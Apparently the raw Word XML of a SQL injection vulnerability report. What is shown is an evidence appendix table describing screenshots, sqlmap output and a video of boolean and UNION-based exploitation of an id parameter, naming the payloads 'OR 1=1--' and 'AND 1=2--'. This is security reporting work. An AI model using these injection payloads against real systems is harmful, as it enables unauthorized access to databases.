            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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51CEB2E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Screenshot of the raw SQL error message returned by the server when a single quote is injected into the id parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06F4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80B8DC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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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1A7C0C5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boolean_poc.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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9366C65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Screenshot showing all forum records returned when OR 1=1-- is injected vs. no records with AND 1=2-- (boolean contrast)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="33A4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205906A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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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CFE23BE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sqlmap_output.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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07CC973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sqlmap terminal output confirming MSSQL injection, listing accessible databases and extracted table names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E2D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7F7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1FF80B0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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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ABEDE03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sqli_demo.mp4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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C33C5C5"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Video walkthrough demonstrating end-to-end exploitation: probing, boolean injection, UNION extraction, and sqlmap enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AAC4B51">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId3" w:type="default"/>
      <w:footerReference r:id="rId4" w:type="default"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1080" w:right="1267" w:bottom="1080" w:left="126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C6252">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="F04E23" w:sz="4" w:space="2"/>
      </w:pBdr>
      <w:spacing w:before="80"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="BBBBBB"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">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31CF9">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="F04E23" w:sz="6" w:space="2"/>
      </w:pBdr>
      <w:spacing w:after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25B13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40"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="F04E23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1A1A2E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289</Words>
  <Characters>1805</Characters>
  <TotalTime>11</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2049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2026-04-16T18:14:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>Ankur Kalita</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-16T18:34:28Z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eyJoZGlkIjoiZDFjMjUxNzU3NzZmZDM3NWQwN2NhOGViNDhjNmYxYjUiLCJ1c2VySWQiOiI1NjcyNzIyNjYzMDkifQ==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24DC302C3A8748B7A7CDF9A14DAD4D25_12</vt:lpwstr>
  </property>
</Properties>
</file>